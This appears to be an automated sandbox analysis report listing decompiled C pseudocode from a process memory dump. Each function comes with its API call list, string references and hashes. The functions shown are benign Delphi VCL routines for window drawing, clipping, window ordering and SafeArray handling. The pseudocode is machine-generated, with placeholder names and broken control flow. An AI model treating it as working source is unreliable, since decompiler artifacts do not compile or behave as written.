Opcode ID: e02ba57b4dad0587dab1b0976f2b4cbb701eef1c5534605c4be55da5e4fc5d9a
Instruction ID: 2d5935f5de0abf565ba2167de1f7639af11b1845c3466f7d6f9300908871c47e
Opcode Fuzzy Hash: e02ba57b4dad0587dab1b0976f2b4cbb701eef1c5534605c4be55da5e4fc5d9a
Instruction Fuzzy Hash: 6E510134A00244EFDB10EF6AC985B5D77F5AF49704F1580BAF804AB3A2D7B8AD44DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043A2D0, Relevance: 12.1, APIs: 8, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043A2D0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E004344B0(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043C1F4(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043C1F4(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E004344B0(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00436D28(_t82, _t99, 0x14, 0);
				E00436D28(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E004141BC( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043A2D0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}

APIs

SaveDC.GDI32 ref: 0043A2E6

Part of subcall function 004344B0: GetWindowOrgEx.GDI32(?), ref: 004344BE
Part of subcall function 004344B0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004344D4

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A307
GetWindowLongA.USER32 ref: 0043A31D
GetWindowLongA.USER32 ref: 0043A33F
SetRect.USER32 ref: 0043A36B
DrawEdge.USER32(?,?,?,00000000), ref: 0043A37A
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A39F
RestoreDC.GDI32(?,?), ref: 0043A410

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: d0140c666f526f50ef5f8ab22513bbbefff9821a20b66eb539e7ba88df28bdfb
Instruction ID: b0e91f104902065cc9bfcf8ecfdf17777c6db61d89a12b26c50b8d396225d46e
Opcode Fuzzy Hash: d0140c666f526f50ef5f8ab22513bbbefff9821a20b66eb539e7ba88df28bdfb
Instruction Fuzzy Hash: 0B416371B041156BDB00DB99CC85F9FB7B8AF48304F10516AF905EB396DA7CDD018799

Uniqueness

Uniqueness Score: -1.00%

Function 0046E234, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 146
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0046E234(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t46;
				int _t56;
				void* _t68;
				void* _t71;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t97;
				intOrPtr _t102;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_v28 = 0;
				_t110 = __edx;
				_t85 = __eax;
				_push(_t113);
				_push(0x46e412);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xffffffe8;
				if(__edx == 0) {
					L8:
					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
						L12:
						if(_t110 != 0 &&  *((intOrPtr*)(_t110 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
							_t92 =  *0x467bd8; // 0x467c24
							if(E00403768(_t110, _t92) == 0) {
								_t93 =  *0x4677c0; // 0x46780c
								if(E00403768(_t110, _t93) == 0) {
									_t94 =  *0x4688d0; // 0x46891c
									if(E00403768(_t110, _t94) == 0 && E0046E204(E00403524(_t110), "TDBEdit") == 0 && E0046E204(E00403524(_t110), "TDBMemo") == 0) {
										_t46 = E0043C4F8(_t85);
										_t132 = _t46;
										if(_t46 != 0) {
											E0046E440(_t85, _t110, _t132);
											_t56 = E0043C1F4(_t110);
											SendMessageA(E0043C1F4(_t85), 0x469, _t56, 0);
										}
										 *((intOrPtr*)(_t85 + 0x20c)) = _t110;
										_t97 =  *0x428db4; // 0x428e00
										if(E00403768(_t110, _t97) != 0) {
											E004086FC( *((short*)(_t85 + 0x21c)),  &_v28);
											E00435BA4(_t110, _t85, _v28, _t110);
										}
									}
								}
							}
						}
						_pop(_t91);
						 *[fs:eax] = _t91;
						_push(0x46e419);
						return E00404348( &_v28);
					}
					if(E0043C4F8(_t85) != 0) {
						SendMessageA(E0043C1F4(_t85), 0x469, 0, 0);
					}
					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
					goto L12;
				}
				_t68 = E0043907C( *((intOrPtr*)(__eax + 0x30))) - 1;
				if(_t68 >= 0) {
					_v8 = _t68 + 1;
					_t108 = 0;
					do {
						_t71 = E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108);
						_t102 =  *0x467bd8; // 0x467c24
						if(E00403768(_t71, _t102) != 0 && _t85 != E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) && _t110 ==  *((intOrPtr*)(E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) + 0x20c))) {
							_v24 =  *((intOrPtr*)(_t110 + 8));
							_v20 = 0xb;
							_v16 =  *((intOrPtr*)(E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) + 8));
							_v12 = 0xb;
							_t89 =  *0x491254; // 0x465870
							E0040A250(_t85, _t89, 1, _t108, _t110, 1,  &_v24);
							E00403DA8();
						}
						_t108 = _t108 + 1;
						_t16 =  &_v8;
						 *_t16 = _v8 - 1;
					} while ( *_t16 != 0);
				}
			}

APIs

SendMessageA.USER32(00000000,00000469,00000000,00000000), ref: 0046E312
SendMessageA.USER32(00000000,00000469,00000000,00000000), ref: 0046E3C7

Strings

TDBMemo, xrefs: 0046E38E
pXF, xrefs: 0046E2D0
$|F, xrefs: 0046E27D, 0046E335
TDBEdit, xrefs: 0046E379

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: $|F$TDBEdit$TDBMemo$pXF
API String ID: 3850602802-2244556849
Opcode ID: e5ea7f58dfe15059218696f4bfb16ac77a01b2a9494904b98044b0598c7e998e
Instruction ID: 42a2ebdc86a7ceb2cdf3d471dffb8ad084e77520ad1fa4256563c2d205324a6a
Opcode Fuzzy Hash: e5ea7f58dfe15059218696f4bfb16ac77a01b2a9494904b98044b0598c7e998e
Instruction Fuzzy Hash: 71413A746102105BCB10EF6BC991A5A77E9AF45708F10907BAC00AB3A3EA7DEC458B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041C04C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041C04C() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x491298; // 0x492030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x491118; // 0x410414
					E0040A250(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403DA8();
				}
				if( *0x492a00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x492a04);
					L004068AC();
					_push(_t58);
					_push(0x41c162);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x4764b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x4764b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x4764b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x4764b8; // 0x0
							_v12 = E004141BC(_t22, 0);
							_t24 =  *0x4764b8; // 0x0
							E004140AC(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41c115, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x492a00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041C16D);
					_push(0x492a04);
					L004069F4();
					return 0;
				}
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 0041C055
GetCurrentThreadId.KERNEL32 ref: 0041C064
RtlEnterCriticalSection.KERNEL32(00492A04,?,?,00000000), ref: 0041C09F
SetEvent.KERNEL32(?,?,00492A04,?,?,00000000), ref: 0041C133
RtlLeaveCriticalSection.KERNEL32(00492A04,0041C16D,00492A04,?,?,00000000), ref: 0041C15C

Strings

0 I, xrefs: 0041C05A

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalCurrentSectionThread$EnterEventLeave
String ID: 0 I
API String ID: 130076905-1101979924
Opcode ID: 4784148f2ae588830669afe7527ee21dc11d938f8ae2d1df5870d658aaf90949
Instruction ID: 94935ce0e79f478707c4f0092ec789d221ad1f1ce9d64de937dfad475c4fce94
Opcode Fuzzy Hash: 4784148f2ae588830669afe7527ee21dc11d938f8ae2d1df5870d658aaf90949
Instruction Fuzzy Hash: 4A314835684280EFD710DB69DC81BAA7BE4EB49304F1680BBE405936A2C77D58C0CB2C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C40C, Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040C40C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C108();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C130();
						if(_t76 != 0) {
							E004028B0(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C138();
						if(_t79 != 0) {
							E004028B0(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C120();
				_t107 = _t49;
				if(_t107 == 0) {
					E004028B0(0x12);
				}
				E0040C2CC(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C150();
				if(_t56 != 0) {
					E004028B0(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C150();
				if(_t58 != 0) {
					E004028B0(0x14);
				}
				_v780();
				_t64 = E0040C3B0(_v788 - 1, _t109);
			}

APIs

VariantCopy.OLEAUT32(?), ref: 0040C43C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C4A1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C4C3
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C502
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C56D
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C58C

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction ID: 53c8fa50fa3af74e803547065bbe6c49ea8385ed887272acae8b06600fc0eaa4
Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction Fuzzy Hash: BB51E2759011299BDB22DB59CDD0ADAB3BCBF08304F0042EAE649E7381D674AF818F65

Uniqueness

Uniqueness Score: -1.00%

Function 004208D0, Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004208D0(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041FC20( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041FC20( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041FD00( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041EF40(E0041FBE4( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041EF40(E0041FBE4( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x004208d1
0x004208dc
0x004208ee
0x004208fd
0x00420937
0x00420948
0x004208ff
0x00420911
0x00420922
0x00420922

APIs

Part of subcall function 0041FC20: CreateBrushIndirect.GDI32(?), ref: 0041FCCA

UnrealizeObject.GDI32(00000000), ref: 004208DC
SelectObject.GDI32(?,00000000), ref: 004208EE
SetBkColor.GDI32(?,00000000), ref: 00420911
SetBkMode.GDI32(?,00000002), ref: 0042091C
SetBkColor.GDI32(?,00000000), ref: 00420937
SetBkMode.GDI32(?,00000001), ref: 00420942

Part of subcall function 0041EF40: GetSysColor.USER32(?), ref: 0041EF4A

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: a6638d6117bb529ea926627c6f0db795f0041ecf8f71370c7e66df592e636c83
Instruction ID: 55d553c2621eb92ca65e360b7563c21cbe5e5e16202b80e0da2f938bdbfb08af
Opcode Fuzzy Hash: a6638d6117bb529ea926627c6f0db795f0041ecf8f71370c7e66df592e636c83
Instruction Fuzzy Hash: A6F0CDB5604100ABDB04FFBADAC6E4B77A8AF0430970444AABD49DF197C93DE8518739

Uniqueness

Uniqueness Score: -1.00%

Function 004545B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004545B0(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x492c04; // 0x2370d40
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00454540, _t37);
						_t17 =  *(_t27 + 0x90);
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t17 =  *(_t27 + 0x90);
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t17 = SetWindowPos(E004141BC( *(_t27 + 0x90), _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}

APIs

EnumWindows.USER32(00454540), ref: 004545E5
GetWindow.USER32(00000003,00000003), ref: 004545FD
GetWindowLongA.USER32 ref: 0045460A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00454649

Strings

dZG, xrefs: 004545B0

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows
String ID: dZG
API String ID: 4191631535-410245891
Opcode ID: 8e359ed334a69be4760922c82b058440bf929986694345fc13871243cf8b0c95
Instruction ID: c7c913ac3e620f8f4a439399e163372e1a93407348564ef15a95a51b3fb9fedf
Opcode Fuzzy Hash: 8e359ed334a69be4760922c82b058440bf929986694345fc13871243cf8b0c95
Instruction Fuzzy Hash: 83115170604210AFDB109F28CC85F9673D4AB56729F55017AFD68AF2D3C3789C85C759

Uniqueness

Uniqueness Score: -1.00%

Function 0044E5EC, Relevance: 7.7, APIs: 5, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0044E5EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t196 = __edi;
				_t202 = _t203;
				_v8 = __eax;
				E00438BE4(_v8);
				_push(_t203);
				_push(0x44e842);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x492709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00438354(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E00435590(_v8, _t98, _t196, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E004355D4(_v8, _t100, _t196, _t214);
					}
					_t180 =  *0x44e850; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E0044DB54(_v8, 1, 1);
						E0043BCF8(_v8, 1, 1, _t215);
					}
					E00436D28(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x44e849);
					return E00438BEC(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x492c08; // 0x237094c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x492c08; // 0x237094c
							E0041F5E8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F5E0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x492c08; // 0x237094c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E0044E974(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E0044DB54(_v8, _t122, _t199);
						E0043BCF8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E6AB
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E727
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E756
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E785
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7A8

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b397a4cf440d93dc7ae4467d2d86ec317741e6a73e626e2f5f43d2d9886ef40e
Instruction ID: 6960c3494087b3200d96737c44c3ee892bb725ce984e2307a56490d00ad7d24d
Opcode Fuzzy Hash: b397a4cf440d93dc7ae4467d2d86ec317741e6a73e626e2f5f43d2d9886ef40e
Instruction Fuzzy Hash: C271C734B04144EFDB00DBA9C589AA9B7F5BF49304F2541F6E408EB362DB35AE45DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00452940, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00452940(void* __eax) {
				void* _t16;
				void* _t39;
				signed int _t42;

				_t16 = __eax;
				_t39 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x476b50 != 0) {
					_t16 = E0043C4F8(__eax);
					if(_t16 != 0) {
						_t42 = GetWindowLongA(E0043C1F4(_t39), 0xffffffec);
						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e2)) != 0) {
							if((_t42 & 0x00080000) == 0) {
								SetWindowLongA(E0043C1F4(_t39), 0xffffffec, _t42 | 0x00080000);
							}
							return  *0x476b50(E0043C1F4(_t39),  *((intOrPtr*)(_t39 + 0x2e4)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x00476BD4 |  *0x00476BDC);
						} else {
							SetWindowLongA(E0043C1F4(_t39), 0xffffffec, _t42 & 0xfff7ffff);
							return RedrawWindow(E0043C1F4(_t39), 0, 0, 0x485);
						}
					}
				}
				return _t16;
			}

0x00452940
0x00452942
0x00452948
0x0045295d
0x00452964
0x00452979
0x00452982
0x00452993
0x004529a6
0x004529a6
0x00000000
0x004529e8
0x004529f9
0x00000000
0x00452a0f
0x00452982
0x00452964
0x00452a16

APIs

GetWindowLongA.USER32 ref: 00452974
SetWindowLongA.USER32 ref: 004529A6
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004505AC), ref: 004529E0
SetWindowLongA.USER32 ref: 004529F9
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004505AC), ref: 00452A0F

Memory Dump Source

